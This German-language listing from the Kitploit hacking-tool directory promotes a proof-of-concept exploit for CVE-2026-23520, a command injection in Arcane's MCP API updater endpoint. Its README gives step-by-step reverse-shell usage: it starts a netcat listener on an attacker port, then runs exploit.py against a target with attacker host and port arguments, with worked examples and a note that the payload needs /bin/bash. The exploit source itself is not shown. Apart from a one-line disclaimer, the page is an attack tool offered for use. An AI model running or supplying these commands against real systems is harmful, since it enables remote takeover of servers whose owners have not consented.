Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23520 — Proof-of-Concept-Exploit für CVE-2026-23520, eine Befehlsinjektions-Schwachstelle im Updater-Dienst von Arcane, die Remote-Codeausführung über manipulierte API-Anfragen ermöglicht. | Kitploit
Tools/GitHubGitHub/cypher-21/cve-2026-23520
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubcypher-21/cve-2026-23520

CVE-2026-23520

Proof-of-Concept-Exploit für CVE-2026-23520, eine Befehlsinjektions-Schwachstelle im Updater-Dienst von Arcane, die Remote-Codeausführung über manipulierte API-Anfragen ermöglicht.

Repository anzeigen
2vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-23520

MCP API Remote Command Execution (RCE) PoC


📌 Überblick

Dieses Repository enthält einen Proof-of-Concept (PoC)-Exploit für eine Remote Command Execution (RCE)-Schwachstelle, die Anwendungen betrifft, die einen verwundbaren MCP-API-Endpunkt (üblicherweise /api/mcp/connect) bereitstellen.

Die Schwachstelle ermöglicht die Ausführung von Systembefehlen über eine manipulierte API-Anfrage.


🚀 Schnellstart

1. Listener starten

root@kitploit:~
nc -lvnp ATTACKER_PORT

2. Exploit ausführen

root@kitploit:~
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT

📥 Verwendung

root@kitploit:~
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]

🔑 Erforderliche Argumente

ArgumentBeschreibung
targetZiel-IP, Domain oder URL
--lhostAngreifer-IP
--lportAngreifer-Port

🔧 Optionale Argumente

FlagBeschreibung
-p, --portZiel-Port (Standard: 443)
-s, --schemehttp oder https (Standard: https)
-e, --endpointAPI-Endpunktpfad
-t, --timeoutAnfrage-Timeout
-v, --verboseDebug-Ausgabe

🧪 Beispiele

root@kitploit:~
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
root@kitploit:~
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444

🧠 Hinweise

  • Ein Timeout bedeutet nicht zwangsläufig einen Fehlschlag.
  • Stellen Sie sicher, dass Ihr Listener vor der Ausnutzung läuft.
  • Das Payload setzt voraus, dass /bin/bash verfügbar ist.

⚠️ Haftungsausschluss

Nur für autorisierte Tests und Bildungszwecke.


👨‍💻 Autor

Parosh B

Tool herunterladen